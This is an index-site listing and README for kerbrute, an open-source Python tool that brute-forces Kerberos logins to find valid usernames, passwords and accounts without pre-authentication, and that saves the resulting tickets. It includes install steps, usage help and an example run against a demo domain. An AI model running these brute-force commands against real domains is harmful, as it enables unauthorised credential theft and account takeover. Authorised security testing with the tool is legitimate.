Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/TarlogicSecurity/kerbrute
An script to perform kerberos bruteforcing by using impacket
https://github.com/TarlogicSecurity/kerbrute
Last synced: 3 months ago
JSON representation
An script to perform kerberos bruteforcing by using impacket
- Host: GitHub
- URL: https://github.com/TarlogicSecurity/kerbrute
- Owner: TarlogicSecurity
- License: gpl-3.0
- Created: 2019-05-13T13:17:18.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2022-04-06T08:00:12.000Z (over 2 years ago)
- Last Synced: 2024-07-07T20:06:59.871Z (4 months ago)
- Language: Python
- Size: 41 KB
- Stars: 414
- Watchers: 7
- Forks: 73
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-rainmana - TarlogicSecurity/kerbrute - An script to perform kerberos bruteforcing by using impacket (Python)
README
# kerbrute
An script to perform kerberos bruteforcing by using the Impacket library.When is executed, as input it receives a user or list of users and a password or list of password. Then is performs a brute-force attack to enumerate:
* Valid username/passwords pairs
* Valid usernames
* Usernames without pre-authentication requiredAs a result, the script generates a list of valid credentials discovered, and the TGT's generated due those valid credentials.
## Installation
From pypi:
```
pip3 install kerbrute
```From repo:
```
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt
```## Use
Help without arguments:
```shell
root@kali:~# kerbrute
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporationusage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
[-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip ] [-threads THREADS]
[-outputfile OUTPUTFILE] [-no-save-ticket]optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-user USER User to perform bruteforcing
-users USERS File with user per line
-password PASSWORD Password to perform bruteforcing
-passwords PASSWORDS File with password per line
-domain DOMAIN Domain to perform bruteforcing
-dc-ip IP Address of the domain controller
-threads THREADS Number of threads to perform bruteforcing. Default = 1
-outputfile OUTPUTFILE
File to save discovered user:password
-no-save-ticket Do not save retrieved TGTs with correct credentialsExamples:
./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
```Example of execution:
```shell
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation[*] Stupendous => triceratops:Sh4rpH0rns
[*] Saved TGT in triceratops.ccache
[*] Valid user => velociraptor [NOT PREAUTH]
[*] Valid user => trex
[*] Saved discovered passwords in jurassic_passwords.txt
```